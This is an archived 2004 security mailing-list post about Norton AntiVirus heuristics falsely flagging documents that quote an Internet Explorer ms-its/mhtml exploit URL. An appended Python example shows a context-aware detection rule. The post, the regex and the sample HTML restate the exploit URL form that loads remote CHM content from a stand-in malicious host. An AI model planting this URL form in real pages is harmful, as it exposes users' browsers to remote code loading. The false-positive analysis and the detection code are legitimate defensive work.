[Dshield] What triggered the positive false alarms (Was: An unfixed highly critical vulnerability discovered in Microsoft Internet Explorer)

Peter Stendahl-Juvonen peter.stendahl-juvonen at welho.com
Thu Apr 15 20:04:29 GMT 2004



list-bounces at lists.dshield.org <mailto:list-bounces at lists.dshield.org>
wrote on Wednesday, April 14, 2004 12:07 AM UTC+3 on behalf of Doug
White  

| NAV2001
| F-PROT
| AVG
| Clam-AV
| Antivir
| 
| All returned the pop-up

|| Running Sophos and do not get anything. Also installed PivX
|| Kwik-Fix... 
|| 
|| Chuck
|| 
|| -----Original Message-----
|| From: list-bounces at lists.dshield.org
|| [mailto:list-bounces at lists.dshield.org] On Behalf Of Paul Marsh
|| Sent: Tuesday, April 13, 2004 8:41 AM To: General DShield Discussion
|| List Subject: RE: [Dshield] An unfixed highly critical vulnerability
|| discovered in Microsoft Internet Explorer
|| 
|| Has anyone running the other AV desktop products tested the site too,
|| to see if it gets caught? http://secunia.com/advisories/10523/
|| 

Doug, Chuck, Paul et al.

Doug, able to confirm the following for the 'other' A/V S/W?


Researched this positive false alarm issue further, found the cause of
the error (for NAV2004), and what triggers the alarms.

When in NAV2004's settings for System | Auto-Protect | Bloodhound | How
to protect against new and unknown viruses | [v] 'Enable Bloodhound
heuristics (recommended)' is set to the option "Highest level of
protection" instead of the default setting "Normal", Norton AntiVirus
2004 (and apparently at least also NAV2003 and NAV2001) erroneously
detects a threat in a Microsoft Word document file containing this
string of characters:

"Example:
ms-its:mhtml:file://C:\does_not_exist.mhtml!http://[malicious_site]//mal
icious.chm::/evil.html"

NAV2004 prompts several positive false alert pop-ups claiming it has
detected "Bloodhound.Exploit.6" in the file containing nothing but the
example string of characters quoted above.

An error in the heuristics algorithm no doubt causes the erroneous
'detection' and the vendor should therefore fix the algorithm.

If you have Microsoft Word (2002 = XP) available with the Norton AntiVirus
plug-in installed, NAV2004 Auto-Protect set to "On" and Script Blocking
set to "On", you will experience this malfunction in NAV2004 when you try
to save the file (or MS Word tries to auto-save the document).

Since it is so trivial to set up this configuration, there is no problem
in reproducing the error.

I have reported two analogical erroneous detections and positive false
alerts to Symantec Corp's Tech Support:

1) The first issue deals with the same erroneous detection and same
positive false alert when browsing Secunia's (an IT-security company)
web page at http://secunia.com/advisories/10523/ . The web page address
contains the very same example quoted above. NAV2004 is unable to access
or repair the file.

2) The second issue deals with a cached image of a web page (URL in issue
# 2 below) containing this same example, causing the same erroneous
detection and the same positive false alerts. After the browser stops
using the file, NAV2004 is able to access and quarantine the file, and,
e.g., send it to Symantec.

I have requested Symantec Corp to correct this error in Norton
AntiVirus2004 (which is present also in NAV2001, NAV2003 and possibly in
NAV2002).


- Pete


"One change leaves the way open for the introduction of others."
Niccolo Machiavelli (1469-1527); Italian philosopher, statesman, writer.
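Added example, not part of Pete's post and not Symantec's Bloodhound code: a small Python scanner that illustrates the failure mode he describes. A context-free heuristic that fires on the `ms-its:mhtml:file://...!http://...chm::/...` string form will alert on a Word document or an advisory page that merely quotes the string, exactly as reported above. The refined rule below alerts only when the URL is embedded in markup and reports a bare occurrence in prose as informational. The sample inputs are constructed for this example (the Word-document text reproduces the quoted example from the post; the host `example.invalid` and file names are placeholders).

```python
import re

# Regex for the cross-protocol URL form quoted in the post. It is deliberately
# loose about whitespace after the scheme prefixes so that a line-wrapped copy
# still matches. Case-insensitive, because URL schemes are.
MS_ITS_MHTML = re.compile(
    r"ms-its:\s*mhtml:\s*file://[^\s\"'<>!]+!\s*https?://[^\s\"'<>]+?\.chm::/[^\s\"'<>]+",
    re.IGNORECASE,
)

# Constructed samples (assumptions for this example, not captured data).
# 1) The text of a Word document that quotes the example from the advisory,
#    as in the false-positive report above.
WORD_DOC_TEXT = (
    "Example:\n"
    "ms-its:mhtml:file://C:\\does_not_exist.mhtml"
    "!http://[malicious_site]//malicious.chm::/evil.html"
)
# 2) A page that carries the same URL form inside an element attribute.
#    Host and file names are placeholders.
HTML_PAGE = (
    "<html><body><p>Demonstration page (constructed sample).</p>"
    '<a href="ms-its:mhtml:file://C:\\nofile.mhtml'
    '!http://example.invalid//demo.chm::/demo.html">x</a>'
    "</body></html>"
)
# 3) Text with the scheme names present but not in the combined form.
CLEAN_TEXT = "Nothing to see here: mhtml: and ms-its: never appear together."


def find_ms_its_mhtml(text):
    """Return (offset, matched_string) for every occurrence of the URL form."""
    return [(m.start(), m.group(0)) for m in MS_ITS_MHTML.finditer(text)]


def context_of(text, pos):
    """Classify where an occurrence sits.

    'markup' if pos lies inside an HTML/XML tag, i.e. the nearest '<' before
    pos has not yet been closed by a '>' ; otherwise 'text' (prose, a quoted
    example, a plain document body).
    """
    last_lt = text.rfind("<", 0, pos)
    last_gt = text.rfind(">", 0, pos)
    return "markup" if last_lt > last_gt else "text"


def classify(text, strict=True):
    """Return 'alert', 'info' or 'clean' for a piece of content.

    strict=False mimics a context-free heuristic: any occurrence of the string
    form alerts. That is the behaviour the post reports for Bloodhound at its
    highest level, and it is why a Word document quoting the example trips it.

    strict=True alerts only when the URL is embedded in markup (an attribute
    value) and downgrades a bare occurrence in prose to 'info', so advisories
    and quoted examples are reported without being treated as a threat.
    """
    hits = find_ms_its_mhtml(text)
    if not hits:
        return "clean"
    if not strict:
        return "alert"
    if any(context_of(text, pos) == "markup" for pos, _ in hits):
        return "alert"
    return "info"


def main():
    samples = {
        "word_doc": WORD_DOC_TEXT,
        "html_page": HTML_PAGE,
        "clean": CLEAN_TEXT,
    }
    for name, content in samples.items():
        naive = classify(content, strict=False)
        refined = classify(content, strict=True)
        print(f"{name:10s} context-free heuristic: {naive:6s} context-aware: {refined}")


if __name__ == "__main__":
    main()
```

The `context_of` check is a deliberately simple tag-boundary test, not an HTML parser; for real content you would feed the attribute values of a parsed document into `find_ms_its_mhtml` instead. The point it demonstrates is the one in the post: the string alone is not evidence of anything, and a heuristic that ignores where the string appears will keep flagging the people who document the issue.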